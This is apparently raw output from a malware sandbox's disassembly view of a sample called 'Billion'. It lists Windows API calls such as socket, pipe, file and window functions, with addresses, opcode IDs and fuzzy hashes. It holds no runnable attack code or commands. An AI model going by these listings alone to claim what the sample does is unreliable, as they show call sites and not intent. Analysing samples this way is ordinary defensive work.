                                                                                                                                                                                                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001B1B6F
                                                                                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001B1B7E
                                                                                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001B1C26
                                                                                                                                                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 001B1C56
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c0e0cfcb961a393ee70d88ac71651ae2825cb02be71f41efc50e56634f16a2e9
                                                                                                                                                                                                                                                                                                          • Instruction ID: b179d19a4fad7f9e93fb55e447e189d8b54146ac4f25fd54ef95aaef8c17dc66
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0e0cfcb961a393ee70d88ac71651ae2825cb02be71f41efc50e56634f16a2e9
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A411571600604AFDB109F24C985FEABBE9EF45324F558069F8059B292DB70ED81CBE0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0019D7CD,?), ref: 0019E714
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0019D7CD,?), ref: 0019E72D
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0019D7F0
                                                                                                                                                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0019D82A
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019D8B0
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019D8C6
                                                                                                                                                                                                                                                                                                          • SHFileOperationW.SHELL32(?), ref: 0019D90C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                                                                                                                                          • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2e89f4d2f3ea5f671598ff359cbd2c41d065e5fbdb03dd55c5d00ca7f3e5ff47
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4e1d9bed14f1bfe63063ba2496b979e36abb659b606b68b8c3b34379d6cdd28d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e89f4d2f3ea5f671598ff359cbd2c41d065e5fbdb03dd55c5d00ca7f3e5ff47
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B4162719052189EDF12EFA4D981EDE77B8AF18340F5004EAE609EB152EB34A788CB50
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetInputState.USER32 ref: 001A4310
                                                                                                                                                                                                                                                                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 001A4367
                                                                                                                                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 001A4390
                                                                                                                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 001A439A
                                                                                                                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001A43AB
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 2256411358-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6cff617ce73d81ae33782c41b1ea05ca21ce9c9e0553f5101e2ae7265ac3210d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 747d0085d3477110e4437732a0d04cbbee7951ee3af34e59d0c66b71e2a9da9f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cff617ce73d81ae33782c41b1ea05ca21ce9c9e0553f5101e2ae7265ac3210d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3531A474904355DFEF38CB74E84DBB67BA8BF92304F14456AD4A2821A1E3F49489CB21
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001C38B8
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C38EB
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C3920
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001C3952
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001C397C
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C398D
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001C39A7
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e425c8fc2259d0ce594cfae812cb048193e6da9338bdcdd1421143b82aeb1c56
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5eac1a2629f93a4d3306488bdcaea155a4b0b20cbcacc5957abcd1acc3e473af
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e425c8fc2259d0ce594cfae812cb048193e6da9338bdcdd1421143b82aeb1c56
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2311530704255EFDB21CF48EC89F6837A5FB9A718F1552A9F5208B2B2CB71E985DB01
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001980D0
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001980F6
                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 001980F9
                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00198117
                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00198120
                                                                                                                                                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00198145
                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00198153
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9d478ee52bce65d9bd431a541bbb482fef5217269ff1d64cc8021e899cb7314b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 79252ffd3b9987bc2c67716c7797e15c322dd1424581f4d21538c39c7a2691fa
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d478ee52bce65d9bd431a541bbb482fef5217269ff1d64cc8021e899cb7314b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F217176600219AFDF14DFA8DC88CBB77ACEB0A3647048535FA15DB290DB74ED868760
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001981A9
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001981CF
                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 001981D2
                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32 ref: 001981F3
                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 001981FC
                                                                                                                                                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00198216
                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00198224
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: a1db4fa03ff62af04bd206e1b445884f0ef48f357b940fa25b2edd596c8a915e
                                                                                                                                                                                                                                                                                                          • Instruction ID: f6432c456f9dbac1959d4e05de3cf1f432d3cd16a5eac38c09c3b671c826cdb3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1db4fa03ff62af04bd206e1b445884f0ef48f357b940fa25b2edd596c8a915e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69215675604504BF9F14DFA8EC89DAA77ECEB0A3607048135F915CB1A1DB70EC82C764
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 001A0E99
                                                                                                                                                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001A0ED5
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                          • String ID: nul
                                                                                                                                                                                                                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                          • Opcode ID: e6f59b5f0576f33b3e29370db316ae6f7a0f0599e4bcc7d0e3f40b4acf34c277
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0930aed564a7dd54358e8a37ff76f34256d46ea28e052e1c290b4992d93bf865
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6f59b5f0576f33b3e29370db316ae6f7a0f0599e4bcc7d0e3f40b4acf34c277
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE21817950030AAFDB318F65DC04A9ABBE8BF5A720F204A69FCA5E72D0D771D841DB50
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 001A0F6D
                                                                                                                                                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001A0FA8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                          • String ID: nul
                                                                                                                                                                                                                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                          • Opcode ID: 06c050437d8bdf6df793ed9045ece410ee83bee23a87abd651a485a3d3a1c169
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9030f79aaff0e44bc4b5b0c2ab89b599431495f6b667f856d09e15f62fe293ec
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06c050437d8bdf6df793ed9045ece410ee83bee23a87abd651a485a3d3a1c169
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B21A179500345EFDB309F689D04A9ABBE8BF5A720F200A19F9A1E32D0D770D981DB50
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001378B1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137873: GetStockObject.GDI32(00000011), ref: 001378C5
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137873: SendMessageW.USER32(00000000,00000030,00000000), ref: 001378CF
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001C4BB0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001C4BBD
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001C4BC8
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001C4BD7
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001C4BE3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                          • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                                          • Opcode ID: 140cc2d1547ba4a5bff702334875e594d5560001f1494900f711422ec52bce52
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9bb376a3c0ba6d299d96b626567ae2bf92bdaf68b3043269692493539752d2ab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 140cc2d1547ba4a5bff702334875e594d5560001f1494900f711422ec52bce52
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E1181B5150219BEEF118E64CC85FEB7F6DEF18758F014111B608A2090CB72DC219BA0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0016DB23: _free.LIBCMT ref: 0016DB4C
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DBAD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00162D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4), ref: 00162D4E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00162D38: GetLastError.KERNEL32(00201DC4,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4,00201DC4), ref: 00162D60
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DBB8
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DBC3
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DC17
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DC22
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DC2D
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DC38
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8b5ffa96e3ce2b022efa3797f90345f50bfc9c83b205965322771e1b81beb38b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B113072A41B04BAD620BBB0DC07FDB77DCAF26700F418C19B299EA252DB75B5248750
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0019E328
                                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 0019E32F
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0019E345
                                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 0019E34C
                                                                                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0019E390
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0019E36D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                                          • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0a144883010202b11602dcc4a86a180cb652210596485dfe37618888b16b4893
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8df11c9e09cb616e2a9ce4ecb6366a1d5cf2e2d8c751b2cb58dfaf04e9dd3330
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a144883010202b11602dcc4a86a180cb652210596485dfe37618888b16b4893
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA01A2F29002087FE71097A4DD89EEA7B6CDB08300F4041A1B705E2441E770DE848B75
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 001A1322
                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?), ref: 001A1334
                                                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,000001F6), ref: 001A1342
                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 001A1350
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001A135F
                                                                                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 001A136F
                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 001A1376
                                                                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001B281D
                                                                                                                                                                                                                                                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001B283E
                                                                                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001B284F
                                                                                                                                                                                                                                                                                                          • htons.WSOCK32(?,?,?,?,?), ref: 001B2938
                                                                                                                                                                                                                                                                                                          • inet_ntoa.WSOCK32(?), ref: 001B28E9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019433E: _strlen.LIBCMT ref: 00194348
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001B3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,001AF669), ref: 001B3C9D
                                                                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 001B2992
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 0016042A
                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00160446
                                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 0016045D
                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0016047B
                                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 00160492
                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001604B0
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00158649,00158649,?,?,?,001667C2,00000001,00000001,8BE85006), ref: 001665CB
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001667C2,00000001,00000001,8BE85006,?,?,?), ref: 00166651
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0016674B
                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00166758
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00163B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00156A79,?,0000015D,?,?,?,?,001585B0,000000FF,00000000,?,?), ref: 00163BC5
                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00166761
